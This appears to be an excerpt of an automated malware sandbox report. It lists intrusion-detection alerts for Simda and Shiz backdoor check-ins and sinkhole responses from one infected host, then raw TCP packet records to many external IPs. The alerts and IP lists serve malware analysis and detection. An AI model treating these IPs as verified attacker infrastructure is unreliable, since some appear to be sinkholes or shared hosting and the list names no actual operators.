2024-08-23T18:48:59.438927+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56392	80	192.168.2.4	3.94.10.34
2024-08-23T18:48:58.452086+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	61952	1.1.1.1	192.168.2.4
2024-08-23T18:47:52.479234+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64283	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:52.479234+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64283	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:01.793758+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49652	3.94.10.34	192.168.2.4
2024-08-23T18:47:01.793758+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49652	3.94.10.34	192.168.2.4
2024-08-23T18:48:59.360466+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56391	80	192.168.2.4	172.234.222.143
2024-08-23T18:48:59.360466+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56391	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:21.509420+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51121	443	192.168.2.4	188.114.97.3
2024-08-23T18:49:01.919618+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56398	80	192.168.2.4	85.17.31.122
2024-08-23T18:49:01.919618+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56398	80	192.168.2.4	85.17.31.122
2024-08-23T18:48:36.648362+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64302	80	192.168.2.4	103.224.212.210
2024-08-23T18:48:36.648362+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64302	80	192.168.2.4	103.224.212.210
2024-08-23T18:47:03.985127+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:03.985127+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:48:59.281482+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56388	80	192.168.2.4	208.100.26.245
2024-08-23T18:48:59.281482+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56388	80	192.168.2.4	208.100.26.245
2024-08-23T18:48:59.413638+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56388	80	192.168.2.4	208.100.26.245
2024-08-23T18:48:59.413638+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56388	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:36.458145+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51122	80	192.168.2.4	13.248.169.48
2024-08-23T18:47:36.458145+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51122	80	192.168.2.4	13.248.169.48
2024-08-23T18:47:51.818588+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:51.818588+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:42.176201+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50751	80	192.168.2.4	72.52.179.174
2024-08-23T18:47:42.176201+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50751	80	192.168.2.4	72.52.179.174
2024-08-23T18:48:59.323898+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56383	80	192.168.2.4	162.255.119.102
2024-08-23T18:48:59.323898+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56383	80	192.168.2.4	162.255.119.102
2024-08-23T18:47:39.441428+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51130	80	192.168.2.4	154.85.183.50
2024-08-23T18:47:39.441428+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51130	80	192.168.2.4	154.85.183.50
2024-08-23T18:48:59.921822+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56395	80	192.168.2.4	172.234.222.143
2024-08-23T18:48:59.921822+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56395	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:52.202984+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64273	80	192.168.2.4	162.255.119.102
2024-08-23T18:47:52.202984+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64273	80	192.168.2.4	162.255.119.102
2024-08-23T18:47:01.520199+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	60209	44.221.84.105	192.168.2.4
2024-08-23T18:47:01.520199+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	60209	44.221.84.105	192.168.2.4
2024-08-23T18:47:52.358805+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64278	443	192.168.2.4	188.114.96.3
2024-08-23T18:48:51.936053+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50116	80	192.168.2.4	64.225.91.73
2024-08-23T18:48:51.936053+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50116	80	192.168.2.4	64.225.91.73
2024-08-23T18:47:53.392700+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:53.392700+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:38.393681+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51128	80	192.168.2.4	103.224.182.252
2024-08-23T18:47:38.393681+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51128	80	192.168.2.4	103.224.182.252
2024-08-23T18:47:16.822889+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49663	80	192.168.2.4	188.114.97.3
2024-08-23T18:47:16.822889+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49663	80	192.168.2.4	188.114.97.3
2024-08-23T18:47:51.597286+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:51.597286+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:04.530284+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49661	443	192.168.2.4	188.114.96.3
2024-08-23T18:47:01.778689+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:01.778689+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49735	80	192.168.2.4	3.64.163.50
2024-08-23T18:48:11.489069+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64284	80	192.168.2.4	5.79.71.225
2024-08-23T18:48:11.489069+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64284	80	192.168.2.4	5.79.71.225
2024-08-23T18:47:20.835861+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49663	80	192.168.2.4	188.114.97.3
2024-08-23T18:47:20.835861+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49663	80	192.168.2.4	188.114.97.3
2024-08-23T18:48:36.316287+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64300	80	192.168.2.4	64.225.91.73
2024-08-23T18:48:36.316287+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64300	80	192.168.2.4	64.225.91.73
2024-08-23T18:47:52.143521+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64277	80	192.168.2.4	3.94.10.34
2024-08-23T18:47:52.143521+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64277	80	192.168.2.4	3.94.10.34
2024-08-23T18:48:24.867558+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64292	80	192.168.2.4	103.150.11.230
2024-08-23T18:48:24.867558+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64292	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:01.793323+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49652	80	192.168.2.4	3.94.10.34
2024-08-23T18:47:01.793323+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49652	80	192.168.2.4	3.94.10.34
2024-08-23T18:49:01.437661+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56397	443	192.168.2.4	188.114.96.3
2024-08-23T18:47:41.579995+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50750	80	192.168.2.4	72.52.179.174
2024-08-23T18:47:41.579995+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50750	80	192.168.2.4	72.52.179.174
2024-08-23T18:48:59.222909+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56384	80	192.168.2.4	3.64.163.50
2024-08-23T18:48:59.222909+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56384	80	192.168.2.4	3.64.163.50
2024-08-23T18:47:51.662556+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:51.662556+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:51.953230+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64271	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:51.953230+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64271	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:38.714787+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51129	80	192.168.2.4	103.224.212.210
2024-08-23T18:47:38.714787+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51129	80	192.168.2.4	103.224.212.210
2024-08-23T18:48:24.316430+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64291	80	192.168.2.4	18.208.156.248
2024-08-23T18:48:24.316430+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64291	80	192.168.2.4	18.208.156.248
2024-08-23T18:49:03.680235+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56400	443	192.168.2.4	188.114.96.3
2024-08-23T18:47:51.938477+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64274	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:51.938477+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64274	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:04.229267+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:04.229267+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:01.471543+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49734	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:01.471543+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49734	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:01.607947+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49732	80	192.168.2.4	162.255.119.102
2024-08-23T18:47:01.607947+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49732	80	192.168.2.4	162.255.119.102
2024-08-23T18:48:59.424615+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56384	80	192.168.2.4	3.64.163.50
2024-08-23T18:48:59.424615+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56384	80	192.168.2.4	3.64.163.50
2024-08-23T18:48:59.226341+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56387	80	192.168.2.4	18.208.156.248
2024-08-23T18:48:59.226341+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56387	80	192.168.2.4	18.208.156.248
2024-08-23T18:47:15.205704+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49658	80	192.168.2.4	5.79.71.225
2024-08-23T18:47:15.205704+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49658	80	192.168.2.4	5.79.71.225
2024-08-23T18:47:01.882748+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49653	80	192.168.2.4	172.234.222.143
2024-08-23T18:47:01.882748+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49653	80	192.168.2.4	172.234.222.143
2024-08-23T18:49:00.250436+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56394	80	192.168.2.4	85.17.31.122
2024-08-23T18:49:00.250436+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56394	80	192.168.2.4	85.17.31.122
2024-08-23T18:47:51.929926+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64272	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:51.929926+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64272	80	192.168.2.4	44.221.84.105
2024-08-23T18:49:02.104297+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56399	80	192.168.2.4	154.212.231.82
2024-08-23T18:49:02.104297+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56399	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:53.751639+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:53.751639+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:49:00.145020+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56385	80	192.168.2.4	188.114.96.3
2024-08-23T18:49:00.145020+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56385	80	192.168.2.4	188.114.96.3
2024-08-23T18:49:03.182843+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56385	80	192.168.2.4	188.114.96.3
2024-08-23T18:49:03.182843+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56385	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:47.291874+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63803	80	192.168.2.4	52.34.198.229
2024-08-23T18:47:47.291874+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63803	80	192.168.2.4	52.34.198.229
2024-08-23T18:47:00.273297+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	53004	1.1.1.1	192.168.2.4
2024-08-23T18:47:51.839405+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:51.839405+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:48:36.203452+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64298	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:36.203452+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64298	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:01.747669+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49651	18.208.156.248	192.168.2.4
2024-08-23T18:47:01.747669+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49651	18.208.156.248	192.168.2.4
2024-08-23T18:47:04.673377+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:04.673377+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:48:28.799086+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64290	80	192.168.2.4	188.114.97.3
2024-08-23T18:48:28.799086+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64290	80	192.168.2.4	188.114.97.3
2024-08-23T18:48:39.716171+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64299	80	192.168.2.4	15.197.240.20
2024-08-23T18:48:39.716171+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64299	80	192.168.2.4	15.197.240.20
2024-08-23T18:48:59.233027+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56386	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:59.233027+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56386	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:36.639004+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64301	80	192.168.2.4	103.224.182.252
2024-08-23T18:48:36.639004+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64301	80	192.168.2.4	103.224.182.252
2024-08-23T18:47:38.185426+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51124	80	192.168.2.4	64.225.91.73
2024-08-23T18:47:38.185426+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51124	80	192.168.2.4	64.225.91.73
2024-08-23T18:48:26.313142+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64292	80	192.168.2.4	103.150.11.230
2024-08-23T18:48:26.313142+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64292	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:19.476260+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51112	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:19.476260+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51112	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:49.946120+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63308	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:49.946120+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63308	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:36.973905+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64303	80	192.168.2.4	154.85.183.50
2024-08-23T18:48:36.973905+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64303	80	192.168.2.4	154.85.183.50
2024-08-23T18:47:51.546324+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:47:51.546324+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.4	208.100.26.245
2024-08-23T18:48:50.293064+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64306	80	192.168.2.4	15.197.240.20
2024-08-23T18:48:50.293064+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64306	80	192.168.2.4	15.197.240.20
2024-08-23T18:48:59.339923+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56390	80	192.168.2.4	44.221.84.105
2024-08-23T18:48:59.339923+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56390	80	192.168.2.4	44.221.84.105
2024-08-23T18:47:54.165366+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:54.165366+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49660	80	192.168.2.4	154.212.231.82
2024-08-23T18:47:25.891710+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49662	80	192.168.2.4	13.248.169.48
2024-08-23T18:47:25.891710+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49662	80	192.168.2.4	13.248.169.48
2024-08-23T18:47:01.518998+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:47:01.518998+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49731	80	192.168.2.4	188.114.96.3
2024-08-23T18:48:31.622568+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64289	80	192.168.2.4	13.248.169.48
2024-08-23T18:48:31.622568+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64289	80	192.168.2.4	13.248.169.48
2024-08-23T18:48:23.528835+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64288	80	192.168.2.4	5.79.71.225
2024-08-23T18:48:23.528835+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64288	80	192.168.2.4	5.79.71.225
2024-08-23T18:48:24.959067+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64293	443	192.168.2.4	188.114.97.3
2024-08-23T18:47:02.370944+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49656	80	192.168.2.4	91.195.240.19
2024-08-23T18:47:02.126233+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49654	443	192.168.2.4	188.114.96.3
2024-08-23T18:47:17.469876+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	51112	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:17.469876+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	51112	80	192.168.2.4	103.150.11.230
2024-08-23T18:47:52.109062+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64275	80	192.168.2.4	69.162.80.60
2024-08-23T18:47:52.109062+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64275	80	192.168.2.4	69.162.80.60
2024-08-23T18:49:01.672638+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	56399	80	192.168.2.4	154.212.231.82
2024-08-23T18:49:01.672638+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	56399	80	192.168.2.4	154.212.231.82
2024-08-23T18:48:35.640695+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	64297	80	192.168.2.4	13.248.169.48
2024-08-23T18:48:35.640695+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	64297	80	192.168.2.4	13.248.169.48
2024-08-23T18:48:57.938393+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	53545	1.1.1.1	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2024 18:47:00.748311996 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:00.753709078 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:00.753776073 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:00.753926039 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:00.762240887 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:00.834583044 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:00.843466997 CEST	80	49732	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:00.843549013 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:00.843699932 CEST	49732	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:47:00.851594925 CEST	80	49732	162.255.119.102	192.168.2.4
Aug 23, 2024 18:47:00.919483900 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:00.931188107 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:00.931265116 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:00.931417942 CEST	49733	80	192.168.2.4	208.100.26.245
Aug 23, 2024 18:47:00.945655107 CEST	80	49733	208.100.26.245	192.168.2.4
Aug 23, 2024 18:47:00.950002909 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:00.950649023 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:00.950830936 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:00.955867052 CEST	80	49734	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:00.955925941 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:00.956464052 CEST	49734	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:00.956499100 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:00.956553936 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:00.956649065 CEST	49735	80	192.168.2.4	3.64.163.50
Aug 23, 2024 18:47:00.956880093 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:00.956979036 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:00.957045078 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:00.962131977 CEST	80	49734	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:00.962142944 CEST	80	49735	3.64.163.50	192.168.2.4
Aug 23, 2024 18:47:00.962152958 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:00.996495962 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.003168106 CEST	80	60209	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.003227949 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.003374100 CEST	60209	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:47:01.013606071 CEST	80	60209	44.221.84.105	192.168.2.4
Aug 23, 2024 18:47:01.164535046 CEST	49651	80	192.168.2.4	18.208.156.248
